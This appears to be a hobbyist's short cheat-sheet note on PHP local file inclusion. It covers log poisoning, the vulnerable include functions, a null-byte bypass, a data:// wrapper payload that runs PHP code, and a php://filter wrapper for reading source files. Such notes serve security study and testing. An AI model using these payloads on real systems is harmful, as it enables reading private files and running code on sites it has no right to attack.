A hobbyist' digital garden

LFI

1 min read

PhpSessionID

A badly designed phpsessionid can lead to LFI

Log poisoning

Look for what is included in logs / var/nginx/access.log - If it include manipulable data (for example user-agent) - It can be used for LFI

Vulnerable usage PHP

Those function can be vulnerable to LFI/RFI:

require
require_once
include
include_once

Bypassing filters

%00
page=data://text/plain,<?php phpinfo();?>

Read local php file

php://filter/read=convert.base64-encode/resource=<FILE\_TO\_READ>

Graph View